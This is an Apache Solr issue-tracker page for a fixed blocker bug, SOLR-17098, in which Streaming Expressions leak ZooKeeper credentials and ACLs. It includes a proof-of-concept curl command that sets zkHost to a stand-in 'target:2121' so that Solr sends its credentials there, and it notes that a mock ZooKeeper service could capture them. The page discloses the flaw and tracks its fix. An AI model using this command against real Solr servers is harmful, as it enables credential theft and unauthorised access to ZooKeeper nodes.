Uploaded image for project: 'Solr'
  1. Solr
  2. SOLR-17098

Zookeeper Credential Information Disclosure bug via Streaming Expressions

    XMLWordPrintableJSON

Details

    • Bug
    • Status: Closed
    • Blocker
    • Resolution: Fixed
    • None
    • 8.11.3, 9.4.1
    • streaming expressions
    • None

    Description

      Security list thread: https://lists.apache.org/thread/byrxkqk15mh6960wmx4r851srosgkvbh

       

      ZK Credentials and ACLs can be exposed to any endpoint when the Streaming Handler is used:

       

      curl --data-urlencode 'expr=search(collection1,
             zkHost="target:2121",
             qt="/export",
             q=":",
             fl="id,a_s,a_i,a_f",
             sort="a_f asc, a_i asc")' http://localhost:8983/solr/demo/stream

       

      In the command above, if the Solr instance has any Zookeeper Credentials or ACLs provided, then that information will be sent to the "target:2121" address. An attacker could set up a mock Zookeeper service to obtain the credentials, and then gain access to the Solr's Zookeeper Nodes.

      Attachments

        1. SOLR-17098.diff
          28 kB
          Houston Putman
        2. SOLR-17098-1.diff
          26 kB
          Houston Putman

        Activity

          People

            houston Houston Putman
            houston Houston Putman
            Votes:
            0 Vote for this issue
            Watchers:
            3 Start watching this issue

            Dates

              Created:
              Updated:
              Resolved: